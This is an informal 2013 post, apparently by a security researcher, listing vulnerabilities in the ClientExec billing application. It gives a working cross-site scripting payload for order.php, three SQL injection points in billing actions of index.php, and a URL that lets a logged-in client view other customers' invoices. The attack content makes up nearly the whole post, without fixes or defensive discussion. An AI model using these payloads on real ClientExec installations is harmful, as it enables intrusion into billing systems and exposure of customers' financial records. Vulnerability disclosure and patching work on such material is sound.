2013/05/24
So I decided to give ClientExec a try. You know what kind of try :)
Let's start with XSS:
/order.php?step=subsearch&tld=false&name=1'){}}alert('xss');function+x(){if('
Some SQLi (log in as a client and set a valid sessionHash):
/index.php?sessionHash=&fuse=billing&sort=1,2&action=GetInvoiceEntries&invoiceid=[SQLi] /index.php?sessionHash=&fuse=billing&action=GetInvoiceList&sort=[SQLi] /index.php?sessionHash=&fuse=billing&action=GetUnInvoicedList&sort=[SQLi]
And uhm, let's view invoices of other users:
/index.php?sessionHash=&fuse=billing&action=GetInvoiceList&customerid=[Customer]
A lot more vulns, of different types, were found, stay tuned.